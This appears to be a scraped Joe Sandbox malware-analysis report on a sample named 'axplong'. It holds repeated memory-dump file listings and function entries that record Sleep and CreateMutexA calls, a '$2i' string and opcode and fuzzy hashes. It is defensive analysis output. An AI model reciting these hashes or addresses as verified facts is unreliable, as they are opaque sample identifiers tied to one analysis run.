Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 6a2086715e39a2b411c1855a89153dfc6c9da44e033511cbff8f3e0916e723e6
Instruction ID: 9664f8d0a22810691a977c4a3768b108ff00b0fdd093a6152ed6938ff365ecf6
Opcode Fuzzy Hash: 6a2086715e39a2b411c1855a89153dfc6c9da44e033511cbff8f3e0916e723e6
Instruction Fuzzy Hash: FAE08630140608BFCE267B28E859A993B5BEF51344F10C818F804463B2CF25EC81C991

Function 00639AD5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 35a6e6e81fd445b90ec68a4b45eaedd38b5880d907595b6c3c3940ef7c473854
Instruction ID: e855ed073b19f17411289e5b212a1e935c41a128b2b24900e1f1f8d553c46046
Opcode Fuzzy Hash: 35a6e6e81fd445b90ec68a4b45eaedd38b5880d907595b6c3c3940ef7c473854
Instruction Fuzzy Hash: 66315B71A04200CBEB089B7CECC476EBB77DF86314F204269E1519B7D6C77599819BA1

Function 00639E74 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: fedfdc4d852de5993f43567436f55e5f8926eecb92ecde453bf1a8e6884c7520
Instruction ID: 53ff712ebfb8498471aafbb5fa0bde9bda7426d5cc5e9713cc7f8dcfe71f7cf4
Opcode Fuzzy Hash: fedfdc4d852de5993f43567436f55e5f8926eecb92ecde453bf1a8e6884c7520
Instruction Fuzzy Hash: 82316831A04200CBEB08DBBCDC847ADBB639F86314F20826CE554EB7D5D77599819BA1

Function 00639FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 7820a96e8f1bd5bc83491674421410fe59d8e69b66a0a6e2190d62a823272d4c
Instruction ID: 4a11cc715026711b78f6d59fb562e3a3e94ed763a8638ab2d31059282209d90e
Opcode Fuzzy Hash: 7820a96e8f1bd5bc83491674421410fe59d8e69b66a0a6e2190d62a823272d4c
Instruction Fuzzy Hash: A9314831B10200CBEB0C9BBCDD8476DB7739F85318F20826CE1509B7D5C775998197A6

Function 0063A0DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 8ad464337f6adf213c679cb25aef7397267703a30b613fbaf16748a26287d906
Instruction ID: bd5261c8b37f3516f360a4c6339c86d396ee6c0043b2cc46bb4e4523e7f3bc46
Opcode Fuzzy Hash: 8ad464337f6adf213c679cb25aef7397267703a30b613fbaf16748a26287d906
Instruction Fuzzy Hash: 43315931A14200CBFB0CDBBCDD887ADBBA39F86314F20426DE150AB7D5D7359981A792

Function 0063A348 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
